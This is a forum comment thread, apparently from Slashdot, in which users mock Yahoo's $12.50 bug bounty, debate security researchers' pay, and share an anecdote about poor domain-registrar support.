
With conduct like this, only the very die hardest of white hat hackers will go to Yahoo from now on. And the 99% will just cash out elsewhere.

ebay of vulnerabilities (0)

Anonymous Coward | about a year ago | (#45000461)

How about creating a bidding portal like ebay but all about security vulnerabilities. Illegal? Then let's do an onion site.
$12.5 is pathetic and we should teach them a lesson.

The math is correct. (0)

Anonymous Coward | about a year ago | (#45001085)

They paid 12.50 for every user that still uses Yahoo.com

No career for professionals? (0)

Anonymous Coward | about a year ago | (#45001347)

Stuff like this makes me wonder if there will be any professional security researchers if no careers are possible. No one can make a living getting $12.50 occasionally. I thought we needed more security professionals, but if they can't have careers, we won't have them.

I won't touch them with a 50,000 ft pole (0)

Anonymous Coward | about a year ago | (#45001591)

I once registered domains through Yahoo! (They actually used an Australian company at the time)...

So one day I needed to set up my own DNS servers (which is one of their products), and after talking for what seemed like days with several of their "tech support" reps, who, no matter how hard I tried, just couldn't figure out what I was talking about, I finally said something like "what is wrong with you people". His response was to hang up and delete my account, leaving me stuck with a bunch of customers' domains in limbo. I had to call Australia, arrange to transfer all the domains to another registrar... it was a mess.

F-U Yahoo! I won't touch you with a 50,000 ft pole. I won't visit your websites, groups, or answer email from your users. You are Yucky!

Life is not fair...what could we do? (0)

Anonymous Coward | about a year ago | (#45002307)

If I lend money to the bank, they pay me back 1% of interest....if I get a loan from them, for the same amount, I have to pay 3%.... fair?

when you have enough power.... (0)

Anonymous Coward | about a year ago | (#45002333)

the concepts of honor, real gratitude, morals and values don't matter... you just crush your enemies... and if they are crushing you, after killing half of your soldiers, you make a deal..

Better to give nothing (2)

istartedi (132515) | about a year ago | (#45002403)

Wow. That's all kind of fail. It would be better for Yahoo to state as a matter of policy that they don't pay bounties. You might disagree with that; but at least you'd respect it. What they did instead is the equivalent of leaving a nickel tip at a restaurant. Giving nothing makes you look cheap, careless or unaware of tipping customs. Giving the nickel says, "yes, I know I should tip, here's what I think you're worth".
